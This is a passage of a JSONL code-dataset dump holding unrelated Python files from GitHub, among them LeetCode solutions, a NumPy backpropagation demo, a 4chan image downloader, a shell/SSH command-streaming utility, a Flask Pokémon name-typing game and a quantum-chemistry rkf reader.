self.trigger_stop_button.setDisabled(True)\n\n # Emit Signal to Switchboard\n self.signal_device_widget_disconnect.emit(self)\n","repo_name":"chenyong2github/UnrealEngine","sub_path":"Engine/Plugins/VirtualProduction/Switchboard/Source/Switchboard/switchboard/devices/shogun/plugin_shogun.py","file_name":"plugin_shogun.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"}
+{"seq_id":"30018700517","text":"\ndef larger_than_right(lst):\n y = max(lst)\n g = lst.index(y)\n newlist = lst[g:]\n newerList = []\n for i,v in enumerate(newlist[:-1]):\n if v > max(newlist[i+1:]):\n newerList.append(v)\n \n if len(newlist) > 1:\n if newlist[-2] > newlist[-1]:\n newerList.append(newlist[-1])\n \n if len(newerList) == 0:\n newerList.append(y)\n \n return newerList\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"vC4P2jGR6wxED7MBL_15.py","file_name":"vC4P2jGR6wxED7MBL_15.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"42503130578","text":"\n# O-\n# /\n# O - O-\n# \\ \n# O-\n\nimport numpy as np\n\ndvalues=np.array([[1.,1.,1.],\n [2.,2.,2.],\n [3.,3.,3.]])\n\nweights=np.array([[1.2,-2.4,-1.3,-4.2],\n [2.4,2.1,-5.2,4.8],\n [-1.1,1.8,6.1,-2.3]]).T\n\ndx0=sum(weights[0]*dvalues[0])\ndx1=sum(weights[1]*dvalues[0])\ndx2=sum(weights[2]*dvalues[0])\ndx3=sum(weights[3]*dvalues[0])\ndinputs=np.array([dx0,dx1,dx2,dx3])\n\n# print(dinputs)\n\ndinputs=np.dot(dvalues,weights.T)\n# print(\"dinputs\\n\",dinputs)\n\ninputs=np.array([[1.2,3.1,1.2,3.1],\n [3.2,5.2,6.7,1.7],\n [4.2,6.3,1.2,6.6]])\n\ndweights=np.dot(inputs.T,dvalues)\n# print(\"dweights\\n\",dweights)\n\ndbias=np.sum(dvalues,axis=0,keepdims=True)\n# print(\"dbias\\n\",dbias)\n\nbias=[1,1,1]\n\nz=np.dot(inputs,weights)+bias\n\ndrelu=np.zeros_like(z)\ndrelu[z>0]=1\ndrelu*=dvalues\n# print(\"drelu\\n\",drelu)\n\n# optimizing drelu calculation\ndrelu=dvalues.copy()\ndrelu[z<=0]=0\n# print(drelu)\n\n# MINIMIZING RELU OUTPUT\noutput=np.dot(inputs,weights)+bias\noutput=np.maximum(output,0)\nprint(output)\ndrelu=output.copy()\ndrelu[output<=0]=0\ndinput=np.dot(drelu,weights.T)\ndweights=np.dot(inputs.T,drelu)\ndbias=np.sum(output,axis=0,keepdims=True)\nweights -= 0.001*dweights\nbias -= 0.001*dbias\nprint(\"minimized output\\n\",np.maximum(np.dot(inputs,weights)+bias,0))\n","repo_name":"Pointdexter16/Neural-Network-concepts-from-scatch-in-python","sub_path":"9.Backpropagation_layer_of_neurons.py","file_name":"9.Backpropagation_layer_of_neurons.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"15485254601","text":"\"\"\"\n动态规划\nhttps://leetcode.cn/problems/house-robber/description/?envType=study-plan-v2&envId=leetcode-75\n你是一个专业的小偷,计划偷窃沿街的房屋。每间房内都藏有一定的现金,影响你偷窃的唯一制约因素就是相邻的房屋装有相互连通的防盗系统,如果两间相邻的房屋在同一晚上被小偷闯入,系统会自动报警。\n\n给定一个代表每个房屋存放金额的非负整数数组,计算你 不触动警报装置的情况下 ,一夜之内能够偷窃到的最高金额。\n\n\n示例 1:\n\n输入:[1,2,3,1]\n输出:4\n解释:偷窃 1 号房屋 (金额 = 1) ,然后偷窃 3 号房屋 (金额 = 3)。\n 偷窃到的最高金额 = 1 + 3 = 4 。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n # if len(nums) == 0:\n # return 0\n\n # 分解成子问题\n \"\"\"\n f(k) = 偷[0..k)房间的最大金额\n f(0) = 0\n f(1) = nums[0]\n f(k) = max { rob(k-1), rob(k-2) + nums[k-1]}\n \"\"\"\n\n # n = len(nums)\n # dp = [0] * (n + 1)\n # dp[0] = 0\n # dp[1] = nums[0]\n pre = 0\n cur = 0\n # for i in range(2, n + 1):\n for i in nums:\n pre, cur = cur, max(cur,i+pre)\n # dp[i] = max(dp[i - 1], dp[i - 2] + nums[i - 1])\n return cur\n\n\nif __name__ == '__main__':\n res = Solution().rob([1, 3, 4, 6])\n print(res)\n","repo_name":"ChenZixinn/leetcode","sub_path":"medium/动态规划/198_打家劫舍.py","file_name":"198_打家劫舍.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"3608711009","text":"# Implement strStr().\n\n# Return the index of the first occurrence of needle in haystack, or -1 if needle is not part of haystack.\n\n# Example 1:\n\n# Input: haystack = \"hello\", needle = \"ll\"\n# Output: 2\n# Example 2:\n\n# Input: haystack = \"aaaaa\", needle = \"bba\"\n# Output: -1\n\ndef strStr(haystack, needle):\n if not needle:\n return 0\n if needle not in haystack:\n return -1\n else:\n w = haystack.index(needle)\n\n return w\n\nhaystack = \"maxwell\"\nneedle = \"we\"\n\nprint(strStr(haystack,needle))","repo_name":"Maxwell2016LeChouchou/coding","sub_path":"leetcode/python/strStr_28.py","file_name":"strStr_28.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"34616370508","text":"from dataclasses import dataclass\nfrom typing import TYPE_CHECKING\n\nimport numpy as np\nfrom loguru import logger # type:ignore\nfrom ravelights.core.bpmhandler import BeatStatePattern\nfrom ravelights.core.colorhandler import Color, ColorHandler\nfrom ravelights.core.device import Device\nfrom ravelights.core.settings import Settings\nfrom ravelights.core.utils import p\n\nif TYPE_CHECKING:\n from ravelights.core.ravelights_app import RaveLightsApp\n\n\n@dataclass\nclass AutoPilot:\n \"\"\"\n autopilot_loop_length [in beats]: randomized is called every n beats\n \"\"\"\n\n root: \"RaveLightsApp\"\n\n def __post_init__(self) -> None:\n self.settings: Settings = self.root.settings\n self.devices: list[Device] = self.root.devices\n\n self.settings.settings_autopilot = dict(\n autopilot=False,\n autopilot_loop_length=4,\n renew_pattern=True,\n p_renew_pattern=0.1, # use in timeline genselector\n renew_pattern_sec=True,\n p_renew_pattern_sec=0.1, # use in timeline genselector\n renew_vfilter=True,\n p_renew_vfilter=0.1, # use in timeline genselector\n renew_thinner=True,\n p_renew_thinner=0.1, # use in timeline genselector\n renew_dimmer=True,\n p_renew_dimmer=0.1, # use in timeline genselector\n color_primary=True,\n p_color_primary=0.1,\n timeline=True,\n p_timeline=0.1,\n alternate_pattern=True,\n p_alternate_pattern=0.1, # run on every item in selected seperately\n alternate_pattern_sec=True,\n p_alternate_pattern_sec=0.1, # run on every item in selected seperately\n triggers=True,\n p_triggers=0.1, # run on every item in selected seperately\n )\n\n def get_autopilot_controls(self):\n controls_autopilot = [\n dict(type=\"toggle\", name_toggle=\"autopilot\"),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern\",\n name_slider=\"p_renew_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_pattern_sec\",\n name_slider=\"p_renew_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_vfilter\",\n name_slider=\"p_renew_vfilter\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_dimmer\",\n name_slider=\"p_renew_dimmer\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"renew_thinner\",\n name_slider=\"p_renew_thinner\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"color_primary\",\n name_slider=\"p_color_primary\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"timeline\",\n name_slider=\"p_timeline\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern\",\n name_slider=\"p_alternate_pattern\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"alternate_pattern_sec\",\n name_slider=\"p_alternate_pattern_sec\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(\n type=\"toggle_slider\",\n name_toggle=\"triggers\",\n name_slider=\"p_triggers\",\n range_min=0.0,\n range_max=1.0,\n step=0.1,\n markers=True,\n ),\n dict(type=\"slider\", name_slider=\"autopilot_loop_length\", range_min=4, range_max=32, step=4, markers=True),\n ]\n return controls_autopilot\n\n def get_color_palette(self):\n # ─── Add Controls Color Palette ───────────────────────────────\n n_colors = 11\n controls_color_palette = [\n ColorHandler.get_color_from_hue(hue) for hue in np.linspace(0, 1, n_colors + 1)[:-1]\n ] + [Color(1, 1, 1)]\n return [f\"rgb({int(r*255)},{int(g*255)},{int(b*255)})\" for (r, g, b) in controls_color_palette]\n\n def randomize(self) -> None:\n \"\"\"Called every frame to randomize parameters within ravelights app.\"\"\"\n\n if not self.settings.settings_autopilot[\"autopilot\"]:\n return None\n\n beat_pattern = BeatStatePattern(loop_length=self.settings.settings_autopilot[\"autopilot_loop_length\"])\n if not beat_pattern.is_match(self.settings.beat_state):\n return None\n\n logger.info(\"run randomize routine\")\n\n # ─── Colors ───────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"color_primary\"]:\n if p(self.settings.settings_autopilot[\"p_color_primary\"]):\n random_color = ColorHandler.get_random_color()\n logger.info(\"set new color_primary\")\n self.settings.color_engine.set_color_with_rule(color=random_color, color_key=\"A\")\n\n # ─── Triggers ─────────────────────────────────────────────────\n\n if self.settings.settings_autopilot[\"triggers\"]:\n for gen_type in [\"pattern\", \"pattern_sec\", \"vfilter\", \"dimmer\", \"thinner\"]:\n for timeline_level in range(1, 4): # levels 1 to 4\n if p(self.settings.settings_autopilot[\"p_triggers\"]):\n logger.info(f\"renew_trigger {gen_type} {timeline_level}\")\n self.settings.renew_trigger(gen_type=gen_type, timeline_level=timeline_level)\n","repo_name":"danuo/chromalights","sub_path":"src/ravelights/core/autopilot.py","file_name":"autopilot.py","file_ext":"py","file_size_in_byte":7014,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"40298769548","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport urllib\r\nimport re\r\nimport os\r\nimport sys\r\n\r\ndef get_soup(url):\r\n return BeautifulSoup(requests.get(url).text, \"lxml\")\r\n\r\ndef get_main_page(board):\r\n return get_soup(\"http://boards.4chan.org/{}/\".format(board))\r\n\r\ndef get_thread_page(board, thread_id):\r\n return get_soup(\"http://boards.4chan.org/{}/res/{}\".format(board, thread_id))\r\n\r\ndef get_thread_ids(board):\r\n main_page = get_main_page(board)\r\n thread_ids = []\r\n for link in main_page.find_all(\"a\", class_=\"replylink\"):\r\n thread_ids.append(link[\"href\"][1:])\r\n return thread_ids\r\n\r\ndef get_image_urls(thread_id):\r\n thread_page = get_thread_page(\"g\", thread_id)\r\n image_urls = []\r\n for post in thread_page.find_all(\"div\", class_=\"postContainer\"):\r\n for link in post.find_all(\"a\"):\r\n if link.has_attr(\"href\") and link[\"href\"].endswith(\"jpg\"):\r\n image_urls.append(link[\"href\"])\r\n return image_urls\r\n\r\ndef download_image(url, filename):\r\n print (\"Downloading {} to {}\".format(url, filename))\r\n urllib.urlretrieve(url, filename)\r\n\r\ndef download_images(board):\r\n thread_ids = get_thread_ids(board)\r\n for thread_id in thread_ids:\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n\r\ndef main():\r\n if len(sys.argv) < 2:\r\n print (\"Usage: python 4chan.py []\")\r\n sys.exit(1)\r\n board = sys.argv[1]\r\n if len(sys.argv) > 2:\r\n thread_id = sys.argv[2]\r\n image_urls = get_image_urls(thread_id)\r\n for url in image_urls:\r\n download_image(url, url.split(\"/\")[-1])\r\n else:\r\n download_images(board)\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"LeoEkky/OpenAI-Codex-Code-Generation","sub_path":"4chan search.py","file_name":"4chan search.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"74922126492","text":"import json as json_module\nfrom typing import List, Union, Optional, Dict\nfrom ctypes import c_void_p, c_char, c_char_p, byref, POINTER, create_string_buffer\n\nfrom ._object import Object\nfrom ._library import yogi_core\nfrom ._json_view import JsonView\nfrom ._enums import ConfigurationFlags, CommandLineOptions\n\n\nclass Configuration(Object):\n \"\"\"Stores program parameters from different sources.\n\n A configuration represents a set of parameters that usually remain constant\n throughout the runtime of a program. Parameters can come from different\n sources such as the command line or a file. Configurations are used for\n other parts of the library such as application objects, however, they are\n also intended to store user-defined parameters.\n \"\"\"\n\n def __init__(self, flags: ConfigurationFlags = ConfigurationFlags.NONE):\n \"\"\"Create a configuration.\n\n Args:\n flags: Flags for changing the configuration's behaviour.\n \"\"\"\n handle = c_void_p()\n yogi_core.YOGI_ConfigurationCreate(byref(handle), flags)\n self._flags = flags\n super().__init__(handle)\n\n @property\n def flags(self) -> ConfigurationFlags:\n \"\"\"Configuration flags.\"\"\"\n return self._flags\n\n def update_from_command_line(self, argv: List[str], options: CommandLineOptions = ConfigurationFlags.NONE) -> None:\n \"\"\"Updates the configuration from command line options.\n\n If parsing the command line, files or any given JSON string fails, or\n if help is requested (e.g. by using the --help switch) then a\n DetailedFailureException will be raised containing detailed\n information about the error or the help text.\n\n Args:\n argv: List of command line arguments including the script name.\n options: Options to provide on the command line.\n \"\"\"\n args = (POINTER(c_char) * (len(argv)))()\n for i, arg in enumerate(argv):\n args[i] = create_string_buffer(arg.encode())\n\n yogi_core.YOGI_ConfigurationUpdateFromCommandLine(self._handle, len(args), args, options)\n\n def update_from_json(self, json: Union[JsonView, str, object]) -> None:\n \"\"\"Updates the configuration from a JSON object or a JSON object\n serialized to a string.\n\n If parsing fails then a DetailedFailureException will be raised\n containing detailed information about the error.\n\n Args:\n json: JsonView, serializable object or already serialized object.\n \"\"\"\n if not isinstance(json, JsonView):\n json = JsonView(json)\n\n yogi_core.YOGI_ConfigurationUpdateFromJson(self._handle, json.data.obj)\n\n def update_from_file(self, filename: str) -> None:\n \"\"\"Updates the configuration from a JSON file.\n\n If parsing the file fails then a DetailedFailureException will be\n raised containing detailed information about the error.\n\n Args:\n filename: Path to the JSON file.\n \"\"\"\n yogi_core.YOGI_ConfigurationUpdateFromFile(self._handle, filename.encode())\n\n def dump(self, *, resolve_variables: Optional[bool] = None, indentation: Optional[int] = None) -> str:\n \"\"\"Retrieves the configuration as a JSON-formatted string.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n\n Returns:\n The configuration as a JSON-formatted string.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n json = c_char_p()\n yogi_core.YOGI_ConfigurationDump(self._handle, byref(json), None, int(resolve_variables), indentation)\n return json.value.decode()\n\n def to_json(self, *, resolve_variables: Optional[bool] = None) -> Dict[str, object]:\n \"\"\"Retrieves the configuration as a JSON object.\n\n Args:\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n\n Returns:\n Dictionary representing the configuration.\n \"\"\"\n return json_module.loads(self.dump(resolve_variables=resolve_variables))\n\n def write_to_file(self, filename: str, *, resolve_variables: Optional[bool] = None,\n indentation: Optional[int] = None) -> None:\n \"\"\"Writes the configuration to a file in JSON format.\n\n This is useful for debugging purposes.\n\n Args:\n filename: Path to the output file.\n resolve_variables: Resolve all configuration variables. If this is\n None then variables will be resolved if and\n only if the configuration supports variables.\n indentation: Number of space characters to use for\n indentation. A value of None uses no spaces\n and omits new lines as well.\n \"\"\"\n if resolve_variables is None:\n resolve_variables = not bool(self._flags & ConfigurationFlags.DISABLE_VARIABLES)\n\n if indentation is None:\n indentation = -1\n\n yogi_core.YOGI_ConfigurationWriteToFile(self._handle, filename.encode(), int(resolve_variables), indentation)\n\n def validate(self, schema: 'Configuration', *, section: str = None) -> None:\n \"\"\"Validates the configuration against a JSON Schema.\n\n The validation is based on JSON Schema draft-07, see\n http://json-schema.org/. The schema to validate against has to be\n supplied in the schema parameter which needs to be a configuration\n object itself.\n\n If the validation fails, a DetailedFailureException with the\n CONFIGURATION_VALIDATION_FAILED error will be raised, containing a\n human-readable description about the failure.\n\n The section parameter can be used to specify a section of the\n configuration to validate instead of the whole configuration.\n\n Args:\n schema: The schema to use.\n section: Section in the configuration to validate; syntax is\n JSON pointer (RFC 6901).\n \"\"\"\n if section:\n section = section.encode()\n\n yogi_core.YOGI_ConfigurationValidate(self._handle, section, schema._handle)\n","repo_name":"yohummus/yogi-framework","sub_path":"yogi-python/yogi/_configuration.py","file_name":"_configuration.py","file_ext":"py","file_size_in_byte":6882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70884293852","text":"\"\"\"\nStreaming Shell / SSH Commands.\n\nReturn Generator Objects enabling streaming output\n\n\"\"\"\nimport os\nimport subprocess\n\n\nfrom cmd_exception import ReturnCodeError\nimport ssh_conn\n\n\ndef run_cmd(command, work_dir=None):\n \"\"\"\n Run shell command with streaming output.\n\n Input:\n command - string of command to run\n work_dir - working directory\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n ReturnCodeError\n\n \"\"\"\n if work_dir is not None:\n os.chdir(work_dir) # Change to working directory\n\n # Run Command\n ps = subprocess.Popen(command, stdout=subprocess.PIPE, shell=True)\n\n # Read + yield stdout until process ends\n while ps.poll() is None:\n line = ps.stdout.readline()\n if line != \"\":\n yield line\n\n return_code = ps.returncode\n # Throw exception if return code is not 0\n if return_code:\n exc = \"\\nCOMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n\ndef run_cmd_list(commands, work_dir=None):\n \"\"\"\n Run a list of shell commands with streaming output.\n\n Input:\n commands - list of commands to run\n work_dir - working directory\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n for command in commands:\n for line in run_cmd(command, work_dir):\n yield line\n\n\ndef run_ssh_cmd(host, command, work_dir=None, username=None,\n key_filename=None, _connection=None):\n \"\"\"\n Run shell command over ssh with streaming output.\n\n Input:\n host - target machine\n command - string of command to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n _connection - SSH Connection\n Returns(per iteration):\n output_str\n Raises:\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n # If no connection passed in create our own\n if _connection is None:\n ssh = ssh_conn.connect(host, username, key_filename)\n else:\n ssh = _connection\n\n # Handle Working Directory\n if work_dir is not None:\n command = \"cd %s && %s\" % (work_dir, command)\n\n # Run Command\n stdin, stdout, stderr = ssh.exec_command(command)\n\n while True:\n out = stdout.readline()\n # Stderr can block waiting so check to see if its ready\n if stderr.channel.recv_stderr_ready():\n out = out + stderr.readline()\n # If\n if out != \"\":\n yield out\n else:\n break\n\n return_code = stdout.channel.recv_exit_status()\n # Throw exception if return code is not 0\n if return_code:\n ssh.close() # Tidy Up\n exc = \"COMMAND:%s\\nRET_CODE:%i\" % (command, return_code)\n raise ReturnCodeError(exc, return_code)\n\n if _connection is None:\n ssh.close()\n\n\ndef run_ssh_cmd_list(host, commands, work_dir=None, username=None,\n key_filename=None):\n \"\"\"\n Run a list of shell commands over ssh with streaming output.\n\n Input:\n host - target machine\n commands - list of commands to run\n work_dir - working directory\n username - target machine user (if not specified current user)\n key_filename - filepath for private key\n Returns (per iteration):\n output_str\n Raises:\n TypeError\n CommandException\n SSHError\n ReturnCodeError\n\n \"\"\"\n if not isinstance(commands, list):\n raise TypeError(\"commands must be a list\")\n\n ssh = ssh_conn.connect(host, username, key_filename)\n\n for command in commands:\n for line in run_ssh_cmd(host, command, work_dir, username,\n key_filename, ssh):\n yield line\n\n ssh.close()\n","repo_name":"graze/pycmd-utils","sub_path":"cmd_utils/streaming.py","file_name":"streaming.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2112718705","text":"# -*- coding: utf-8 -*-\nimport os\n\nfrom flask import Flask, render_template, request\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport random\n\napp = Flask(__name__)\n\nMONSTER_NO_MAX=898\nIMG_SOURCE_URL='https://zukan.pokemon.co.jp/detail/'\n\nclass Monster:\n pass\n\n@app.route(\"/\")\n@app.route(\"/\", methods=['GET', 'POST'])\ndef show(id=None, mistake=False):\n if id is None: id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n\n print(id)\n url = IMG_SOURCE_URL + str(id)\n\n http = urllib3.PoolManager()\n r = http.request('GET', url)\n\n soup = BeautifulSoup(r.data, 'html.parser')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:image'})\n img_url = meta_tag[0].get('content')\n meta_tag = soup.find_all('meta', attrs={'property': 'og:title'})\n name = meta_tag[0].get('content').split(u'|')[0].split()[0]\n def translate_kana2alphabet(kana):\n map_k2a = {u'ア':'A', u'イ':'I', u'ウ':'U', u'エ':'E', u'オ':'O', u'カ':'KA', u'キ':'KI',u'ク':'KU',u'ケ':'KE',u'コ':'KO',\n u'サ':'SA',u'シ':'SHI',u'ス':'SU',u'セ':'SE',u'ソ':'SO',u'タ':'TA',u'チ':'CHI',u'ツ':'TU',u'テ':'TE',u'ト':'TO',\n u'ナ':'NA',u'ニ':'NI',u'ヌ':'NU',u'ネ':'NE',u'ノ':'NO',u'ハ':'HA',u'ヒ':'HI',u'フ':'FU',u'ヘ':'HE',u'ホ':'HO',\n u'マ':'MA',u'ミ':'MI',u'ム':'MU',u'メ':'ME',u'モ':'MO',u'ヤ':'YA',u'ユ':'YU',u'ヨ':'YO',u'ワ':'WA',u'ヲ':'WO',u'ン':'NN',\n u'ラ':'RA',u'リ':'RI',u'ル':'RU',u'レ':'RE',u'ロ':'RO',\n u'ガ':'GA',u'ギ':'GI',u'グ':'GU',u'ゲ':'GE',u'ゴ':'GO',u'ザ':'ZA',u'ジ':'JI',u'ズ':'ZU',u'ゼ':'ZE',u'ゾ':'ZO',\n u'ダ':'DA',u'ヂ':'DI',u'ヅ':'DU',u'デ':'DE',u'ド':'DO',u'バ':'BA',u'ビ':'BI',u'ブ':'BU',u'ベ':'BE',u'ボ':'BO',\n u'パ':'PA', u'ピ':'PI',u'プ':'PU',u'ペ':'PE',u'ポ':'PO',u'ヴ':'VU',u'ッ':'XTU',u'ャ':'XYA',u'ュ':'XYU',u'ョ':'XYO',\n u'ァ':'XA',u'ィ':'XI',u'ゥ':'XU',u'ェ':'XE',u'ォ':'XO',\n u'ー':'-',u'・':'',u' ':' ',u'♀':'',u'♂':'',u'Z':'Z',u':': ''}\n alphabets = []\n for char in kana:\n alphabets.append(map_k2a[char])\n\n # 「ッ」の処理\n for i, alphabet in enumerate(alphabets):\n if alphabet == 'XTU': alphabets[i+1] = alphabets[i+1][0] + alphabets[i+1][:]\n\n # 「ャ」「ュ」「ョ」の処理\n # ���下、前の子音+母音でいけるもの KI XYA -> KYA\n # 「キャ」「キュ」「キョ」「シャ」「シュ」「ショ」「チャ」「チュ」「チョ」「ニャ」「ニュ」「ニョ」「ヒャ」「ヒュ」「ヒョ」\n # 「ミャ」「ミュ」「ミョ」「リャ」「リュ」「リョ」「ギャ」「ギュ」「ギョ」「ジャ」「ジュ」「ジョ」「ヂャ」「ヂュ」「ヂョ」\n # 「ビャ」「ビュ」「ビョ」「ピャ」「ピュ」「ピョ」\n for i, alphabet in enumerate(alphabets):\n if alphabet in ('XYA', 'XYU', 'XYO'): \n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][2]\n else:\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1:3]\n elif alphabet in ('XE'):\n if alphabets[i-1] in ('SHI','CHI','JI'):\n alphabets[i-1] = alphabets[i-1][:-1] + alphabets[i][1]\n \n alphabets = [alphabet for alphabet in alphabets if alphabet not in ('XYA', 'XYU', 'XYO','XE', 'XTU', '')]\n print(alphabets)\n return ' '.join(alphabets)\n\n alphabets = translate_kana2alphabet(name)\n\n return render_template('index.html', id=id, img_url=img_url, name=name, alphabets=alphabets, mistake=mistake)\n\n@app.route(\"/check\", methods=['POST'])\ndef cehck():\n print(request.form.get('input'))\n input = request.form.get('input').replace(' ', '')\n name = request.form.get('alphabets').replace(' ', '')\n id = request.form.get('id')\n\n if input.lower() == name.lower():\n new_id = \"{:03d}\".format(random.randint(1, MONSTER_NO_MAX))\n return show(new_id)\n else:\n return show(id, mistake=True)\n\n@app.route(\"/search\")\ndef search():\n return render_template('search.html')\n\n@app.route(\"/test\")\ndef test():\n return render_template('test.html')\n\nif __name__ == \"__main__\":\n #app.run(debug=True, host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 8080)))\n app.run(debug=True)","repo_name":"shuuuuua/typing_monsters","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4433,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27600229294","text":"\"\"\"\r\nModule containing functions for extracting SFO data from the rkf files of fragment analysis calculations.\r\nThe following terms can be extracted form the rkf files:\r\n- Overlap (in a.u.)\r\n- Orbital Energy (in eV)\r\n- Occupation (in a.u.)\r\n- Gross Populations (in a.u.)\r\n\r\nBEFORE READING FURTHER: please read the following section about the format of the rkf files:\r\nhttps://www.scm.com/doc/ADF/Appendices/TAPE21.html\r\n\r\nImportant sections together with associated variables are (format: (\"section\", \"variable\")):\r\n- \"Symmetry\", \"ncbs\" = Number of frozen cores per irrep of the complex calculation (could not find a better alternative for Fragment calculations)\r\n- \"SFOs\", \"fragment\" = Fragment index of the ACTIVE* SFOs\r\n- \"SFOs\", \"subspecies\" = Symmetry labels of each ACTIVE SFO (e.g. 1: \"A1\", 2: \"A1\", 3: \"A2\", 4: \"A2\", ...)\r\n- \"SFOs\", \"occupation\" = Occupations of the ACTIVE SFOs\r\n- \"SFOs\", \"escale\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are taken into account)\r\n- \"SFOs\", \"energy\" = Orbital energies of ACTIVE SFOs in Ha (relativistic effects are NOT taken into account)\r\n- \"SFO popul\", \"sfo_grosspop\" = Gross populations of the SFOs (FROZEN SFOS INCLUDED!)\r\n\r\nthat can be viewed in the KF Browser of AMS (open a \"adf.rkf\" file and press \"ctrl + E\" on Windows or \"cmd + E\" on Mac).\r\n* Active SFOs are SFOs that are not frozen cores.\r\n\"\"\"\r\nfrom __future__ import annotations\r\n\r\nfrom typing import Callable, Sequence\r\n\r\nimport numpy as np\r\nfrom scm.plams import KFFile\r\n\r\nfrom orb_analysis.custom_types import Array1D, UnrestrictedPropertyDict, SpinTypes\r\n\r\n# --------------------Helper Function(s)-------------------- #\r\n\r\n\r\ndef split_1d_array_into_dict_sorted_by_irreps(data_array: Array1D, irreps: Sequence[str], ) -> dict[str, Array1D]:\r\n \"\"\"\r\n Splits a 1D array into a dictionary of arrays based on the irreps. The irreps are the keys of the dictionary.\r\n data_array and irreps must have the same length.\r\n \"\"\"\r\n n_entries_per_irrep = [irreps.count(irrep) for irrep in set(irreps)]\r\n data_ordered_by_irrep = {irrep: np.zeros(n_entries) for irrep, n_entries in zip(set(irreps), n_entries_per_irrep)}\r\n\r\n # Now we loop over the irreps and add the data to the right array\r\n irrep_counter = {irrep: 0 for irrep in set(irreps)}\r\n for data_entry, irrep in zip(data_array, irreps):\r\n data_ordered_by_irrep[irrep][irrep_counter[irrep]] = data_entry\r\n irrep_counter[irrep] += 1\r\n return data_ordered_by_irrep\r\n\r\n\r\n# -------------------Low-level KF reading -------------------- #\r\n\r\ndef get_frag_name(kf_file: KFFile, frag_index: int) -> str:\r\n \"\"\" Returns the name of the fragment. \"\"\"\r\n frag_name_per_sfo = kf_file.read(\"SFOs\", \"fragtype\").split() # type: ignore\r\n frag_names = list(dict.fromkeys(frag_name_per_sfo))\r\n return frag_names[frag_index - 1]\r\n\r\n\r\ndef uses_symmetry(kf_file: KFFile) -> bool:\r\n \"\"\" Returns True if the complex calculation uses symmetry for its MOs and other parts such as gross populations and overlap. \"\"\"\r\n grouplabel: str = kf_file.read(\"Symmetry\", \"grouplabel\").split()[0] # type: ignore\r\n return grouplabel.lower() != \"nosym\"\r\n\r\n\r\ndef get_total_number_sfos(kf_file: KFFile) -> int:\r\n \"\"\" Returns the total number of *active* SFOs (frozen core SFOs excluded), which is the sum of the 